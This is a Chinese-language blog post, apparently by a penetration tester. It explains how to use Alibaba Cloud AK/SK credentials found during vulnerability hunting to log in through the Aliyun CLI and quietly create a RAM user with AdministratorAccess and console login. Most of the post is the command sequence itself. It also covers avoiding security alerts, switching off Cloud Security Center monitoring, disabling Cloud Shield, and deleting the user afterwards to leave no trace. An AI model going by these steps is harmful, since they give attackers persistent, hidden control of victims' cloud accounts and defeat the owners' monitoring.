/1dreamGN/Blog

1dreamGN

阿里云AK/SK通过RAM用户访问凭证

77
2023-11-18
阿里云AK/SK通过RAM用户访问凭证

之前挖漏洞挖到的阿里云ak和sk经常用cf来登录,但是现在用cf登录的话阿里云容易告警,应该是云厂商研究了cf的特征。现在用cf登录的话会直接紧急告警,所以在我面前有两种方法可选择,一是修改cf特征(二开),二是使用RAM用户登录,告警会降低级别,不会出现紧急告警的情况。

首先我用自己的阿里云账户创建一个云存储,生成ak和sk,然后调用RAM,具体文档在这里
RAM用户概览
这个文档的操作都是在控制台进行的,渗透过程中只有AK和SK,登录不了控制台,但是有一个工具可以实现创建RAM用户,那就是阿里云CIL,可以在官方文档中自行下载。

全指令查询 aliyun ram

安装好后,打开工具窗口,输入版本命令,查看工具当前版本。

1.png

输入aliyun configure,然后再输入得到的ak,sk和云服务所在地区,登陆成功会显示阿里云的LOGO。

2.png

创建RAM账号,aliyun ram CreateUser --UserName gowninng

微信图片_20231118111231.png

aliyun ram CreateLoginProfile --UserName gowninng --Password 123456789 其中CreateLoginProfile指令为给账户添加web控制台的权限。

微信图片_20231118111418.png

aliyun ram ListUsers 查看用户是否创建成功。

微信图片_20231118111529.png

aliyun ram ListPolicies 列出权限列表。

微信图片_20231118111802.png

aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName gowninng

其中AttachPolicyToUser给用户加权限 。

微信图片_20231118112331.png

取消管理员权限 aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName gowninng

删除用户 aliyun ram DeleteUser --UserName gowninng

这样就不留痕迹了。

登录账号密码为 账号@别名,密码是自己设置的密码

aliyun ram GetAccountAlias 查询此账户的别名。

微信图片_20231118111101.png

然后登陆

微信图片_20231118113228.png

微信图片_20231118113254.png

并没有告警

微信图片_20231118113354.png

如果有告警的话就把云盾干了,记住要先把在云安全中心的所有的监控都都关闭。

思路来自RAM文档